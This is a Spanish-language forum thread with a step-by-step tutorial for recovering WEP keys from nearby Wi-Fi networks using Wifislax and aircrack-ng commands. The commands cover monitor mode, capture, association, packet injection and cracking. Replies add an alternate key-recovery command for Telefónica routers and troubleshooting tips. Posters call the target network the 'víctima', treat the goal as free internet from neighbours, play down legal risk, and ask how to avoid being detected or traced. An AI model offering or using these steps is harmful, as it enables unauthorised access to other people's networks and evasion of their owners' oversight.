TUTORIAL: Auditoria Wireless Wifislax, saca claves WEP de redes inalámbricas

TUTORIAL - AUDITORIA WIRELESS CON WIFISLAX


Bueno chavos, pues aquí les traigo un tuto para hacer auditoria wireless con wifislax 3.1, lo siguiente

es una recopilación de los pasos que se deben seguir para lograrlo satisfactoriamente.

El "tutorial" original se encuentra en el siguiente link:

http://foro.seguridadwireless.net/index.php/topic,4528.0.html

De ahí he tomado la idea basica y las fotografías también aunque subidas desde otro servidor, le he

agregado detalles ya que en ese "tutorial" no se explica nada a detalle y es poco entendible para

algunos.

Falta decir que ni yo ni la página nos hacemos responsables de bla, bla, bla, bla....

FAQ:

Para qué sirve la auditoria wireless?
Para inyectar paquetes a un punto de acceso y así poder obtener la clave WEP de los mismos.

Sirve para los módem infinitum?
Sí, si sirve.

Todas las tarjetas wlan son compatibles?
No, no todas sirven para inyección, te tocará buscar alguna que lo sea.

Empezemos


Lo que necesitamos:

- Wifislax 3.1 (Descargalo desde aquí)
- PC con tarjeta de red inalámbrica compatible
- 10 mins de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu wlan.
- Pluma y papel.

Procedimiento:

Después de bajar el iso lo queman con el Nero, así les quedara un bonito live cd de linux. (Ya deberían

saber como se queman los iso)

Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos desde el cd-rom, después de

unos minutos y de una o dos opciones que te aparecen, seguir unas cuantas indicaciones te loggeas e

inicias el entorno gráfico (Es muy fácil por eso no doy detalles).

Ya en el wifislax le das en el icono del escritorio "Shell" y te abre una ventana parecida al MS-DOS a

la cual le llamaremos "Consola" de ahora en adelante.

Ya en la empezaremos checando las tarjetas wlan con el siguiente comando:

iwconfig

Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que utilizarás, yo utilizo

una alfa network de 500mw y me basaré en ella.

Una vez identificada tu tarjeta se procede a correr el modo monitor con el siguiente comando:

airmon-ng start wlan0 6

Atención: Con este comando se inicia el modo monitor en el canal 6, si deseas utilizar otro canal para

detectar otras redes puedes sustituir el 6 por cualquier otro número.




Después de activado el modo monitor empezaremos a detectar redes en este caso en el canal 6.

airodump-ng -w aaaa -c6 wlan0 (Aquí mismo sustituyes -c6 por el canal que tú quieras) (El aaaa es un

nombre de archivo elegido por tí, se puede llamar hola si tú quieres)




Escoges alguna red con encriptación WEP, abres una nueva consola y escribes lo siguiente:

aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0

Ahora explico el comando:

XXXX - Aquí va el ESSID de tu victima
MACV - Aquí va la dirección MAC de tu víctima
MACC - Aquí debes introducir la dirección MAC de tu wlan.

Quedaría más o menos así:

aireplay-ng -1 30 -e INFINITUMXXX -a 00:00:00:00:00 -h 00:00:00:01 wlan0

Con esto tu tarjeta quedará asociada con el punto de acceso víctima




Ahora empezaremos a inyectar paquetes usando el siguiente comando:

aireplay-ng -3 -x600 -b MACV -h MACC wlan0 (En este momento ya debes saber donde vas a sustituir y con

que)

Quedaría más o menos así:

aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0

Después de esto los paquetes empezarán a ser enviados.




Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:

Abres una nueva consola y escribes lo siguiente:

aircrack-ptw aaaa-01.cap (Aquí se utiliza el nombre de archivo que especificamos casi al principio al

correr el airodump más el -01 o cualquier otro número -02, -03 etc...)




Apuntas la clave WEP y listo.

CUALQUIER DUDA O CORRECIÓN SON BIEN RECIBIDOS.

A VER SI LO VE UN MOD Y LO PONE EN TUTORIALES :-D

jejejeje gracias por el tuto man...

nomas que... ps ya hay uno jejejeje...

http://www.nextgameday.com/foro/showthread.php?t=46025

pero pss esta un poquito menos laborioso el tuyo pues de todas formas esta chido

ahi cualquiera que les sirva

gracias men por el tuto

Sí men, pero ese es para wifiway, este es para el slax con menos pasos, porque hay mucho a los que no le funciona el wifiway, como a mí. xD

Saludos!

hehe agrego a indice linux
mmm haciendoles un pregunta?
que tan riesgoso es en lo legal?

salu2 amigoxos

ahh es cierto, tienes razon

ta ueno, alraton lo pruebo

Y sobre cuestiones legales, mientras no te metas con bancos, el gobierno u empresas poderosas como telmex, no creo que tengas alguna bronca...

ademas esta medio cañon burlar la seguridad de estos jejejeje

generalmente, esto es nomas para tener internet gratis, pero aun asi en mexico creo que no hay leyes que regulen esto

jajaja ok compa esta weno pero indica con que tarjetas es compatible en modo monitor y de inyeccion, yo recomiendo sin duda la ip3945

OJO: pero debe de ser la ABG
por que exite otro modelo solo que no la recuerdo, y tiene cre que es mas laborioso me gustaria poner un tuto, voy a ver si lo creo y lo comparto xD

mientras voy a oir el sonido subliminal que subieron , pa la weba xD

Solo funciona con OS linux?

el sistema operativo es lo de menos, todo es desde el cd

SALUDOS: SOLO QUIERO DECIRLES QUE EN LA ULTIMA PARTE QUE DICE ((aircrack-ptw aaaa-01.cap) EN ALGUNAS COMPUTADORAS NO FUNCIONA PERO PUEDEN UTILIZAR ESTE:


aircrack-ng aaaa-01.cap

solo teclea este commando y listo.

espero les ayude mucho,, saludos.

Pues gracias por el tip mi buen, al menos a mi siempre me ha funcionado el -ptw, pero no esta de mas tener otra opcion.

saludos!!

Hola , me llamo Manuel santos y es la primera ves que entro en este gran foro , es muy interesante todo lo que e podido leer y entender , espero me disculpéis por si me precipito en mis actuaciones , no acostumbro a participar en foros y soy un poco torpon

Conforme al tema en cuestión yo e utilizado el wifisla 3.0 y una antena alfa networ

Luego una vez reinicio habiendo introducido wifisla y se abre

e puesto en loging- root
en passwoor-toor
sale wifisla -xconf
sale wifisla -startx y ya sabemos que esto es para configurar la tarjeta grafica de linux
se abre el entorno de wifisla y su música
wfisla -iwconfig wlan0
wifisla -airmon-ng start wlan0 6
wifisla - iwconfig wlano
wifisla - airodump-ng -w xxxx wlan0 ( esto es para buscar canal)
hay un pequeño toque de dos teclas y seguimos
wifisla- airodump-ng -w xxxx -c11 wlan0
hay un pequeño toque de dos teclas de nuevo
wifisla - ls
cierro la ventana ( se me olvidaba , una ves hubiera captura do un solo paquete
y teniendo guardado en la unidad c del pc airelab y el comando universal

cd..&&cd..&&cd AIRELAB&&EWF 00:00:00:00:00:00 WLAN_00 xxxx-02.cap (clave universal) poniendo la mac del routers atacado y su nombre wlan_00 o xx y el ivs capturado -02.cap o -03.cap etc
Me voy a Home en wifisla y copio clave -02.cap
pincho carpeta mnt luego en sda1 que contiene el airela , vuelvo a pinchar y pego en el centro pantalla con post file , cierro todas las ventanas .
entro en la unidad c copio comando universal con su mac y los punto cap correspondiente y pincho en airela , pincho en acceso directo a consola y pego comando universal y obtengo la clave en tan solo 3, 4 minutos siempre que tenga capturado un mínimo de 1 o mas paquetes aveces ,espero que os sirva de algo .

Mi pregunta es que en alguno routers de telefónica (wlan_7B ) aun teniendo la clave y colocándola y diciendo me el ordenador obteniendo direccion de red y luego me pone conectado , es que al querer entrar en Internet no me deja ( y creo que no me designa ip por alguna configuracion interna del routers , e intentado cambiar mi ip y la mac de la antena y aun asin no me deja después de tener la clave , ¿ podéis ayudarme

Hola , me llamo Manuel santos y es la primera ves que entro en este gran foro , es muy interesante todo lo que e podido leer y entender , espero me disculpéis por si me precipito en mis actuaciones , no acostumbro a participar en foros y soy un poco torpon

Conforme al tema en cuestión yo e utilizado el wifisla 3.0 y una antena alfa networ

Luego una vez reinicio habiendo introducido wifisla y se abre

e puesto en loging- root
en passwoor-toor
sale wifisla -xconf
sale wifisla -startx y ya sabemos que esto es para configurar la tarjeta grafica de linux
se abre el entorno de wifisla y su música
wfisla -iwconfig wlan0
wifisla -airmon-ng start wlan0 6
wifisla - iwconfig wlano
wifisla - airodump-ng -w xxxx wlan0 ( esto es para buscar canal)
hay un pequeño toque de dos teclas y seguimos
wifisla- airodump-ng -w xxxx -c11 wlan0
hay un pequeño toque de dos teclas de nuevo
wifisla - ls
cierro la ventana ( se me olvidaba , una ves hubiera captura do un solo paquete
y teniendo guardado en la unidad c del pc airelab y el comando universal

cd..&&cd..&&cd AIRELAB&&EWF 00:00:00:00:00:00 WLAN_00 xxxx-02.cap (clave universal) poniendo la mac del routers atacado y su nombre wlan_00 o xx y el ivs capturado -02.cap o -03.cap etc
Me voy a Home en wifisla y copio clave -02.cap
pincho carpeta mnt luego en sda1 que contiene el airela , vuelvo a pinchar y pego en el centro pantalla con post file , cierro todas las ventanas .
entro en la unidad c copio comando universal con su mac y los punto cap correspondiente y pincho en airela , pincho en acceso directo a consola y pego comando universal y obtengo la clave en tan solo 3, 4 minutos siempre que tenga capturado un mínimo de 1 o mas paquetes aveces ,espero que os sirva de algo .

Mi pregunta es que en alguno routers de telefónica (wlan_7B ) aun teniendo la clave y colocándola y diciendo me el ordenador obteniendo direccion de red y luego me pone conectado , es que al querer entrar en Internet no me deja ( y creo que no me designa ip por alguna configuracion interna del routers , e intentado cambiar mi ip y la mac de la antena y aun asin no me deja después de tener la clave , ¿ podéis ayudarme

hola tengo una lap acer con tarjeta de red integrada 802.11 b/g y pasa lo siguiente:

baje la imagen y todo bien entro a la consola y pongo iwconfig
cuando pongo airmon-ng start wlan0 6 me sale una pantalla que dice:

interface chipset driver
eth0 broadcom bcm43xx


y escribo airodump-ng -w aaaa -c6 wlan0
me aparese lo siguiente: wlan0 is not a network interface.

haber si me puedes ayudar gracias por tu aporte

Antes tienes que poner la tarjeta broadcom en modo monitor

si no lo haces, no te va a jalar

para laps que tienen broadcom es casi necesaria una antena mas potente porque tienen problemas al inyectar paquetes

abur

y como pongo en modo monitor la broadcom? aquiles gracias por tu respuesta

Hola , e visto un pequeño detalle que a ustedes les puede ser de gran ayuda
cuando se pone el comando (aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0) y se han conseguido x paquetes no se puede poner directamente( aircrack-ptw aaaa-01.cap) antes de esto se a de ejecutar otro comando que nos indicara los punto cap obtenidos y nos dirá si es aaaa-01 o 02 o 03.cap y luego ejecutaremos ( aircrack-ptw aaaa-01.cap ) para ver si nos a conseguido la clave y si no es así seguiremos inyectando paquetes, saludos

mmm hay alguna forma de ocultarse? he visto en los modems de 2wire... ke salen cuantas computadoras estan conectadas a esa red wifi ... ... lo ke trato de decir es como ocultarse almenos hay .... :twisted:

y xke no como ... evitar se rastreados.... y como reastrear!!! :-p
pago con puntos!!!!

yo probe con linux wifi 3.4 y tine todas la actualisaciones y lo intale a mi pc haciendo una conparticion de linux hacies qe lo llevo atodas partes jiji y solo me tardo como 5 minutos en lo que bajan los paketes jjajaj les recomiento que sean redes sercanas ya que las que tiene pokito es mas dificil y luego se pierde la señal y vale para un cacahuate lo que emos hecho pero si sirbe y seria mas viable que se llamara el tuto descrictacion de claves de redes inalambricas por que eso es lo que hacemos descrycar salduos y suerte

hola tengo un problema y cuando voy a poner iwconfig me sale un mensaje que pone "no wireless extensions" no se si no es el driver o realmente no se, como puedo solucionar eso?

solo tengo una duda disculpen y si me pueden ayudar, pues encuentro 2 redes(SID1y Monterrey2B) la cosa es que en el tutorial dice ingresar la mac de la victima, pero mi duda es como la averiguo si estas redes las encontre asi nomas cerca de mi casa, o el programa funciona con la mac de los ceros? nose, esa es mi duda, como saco la mac de estas redes, o el mismo wifislax la encuentra?. gracias de verdad por ayudar.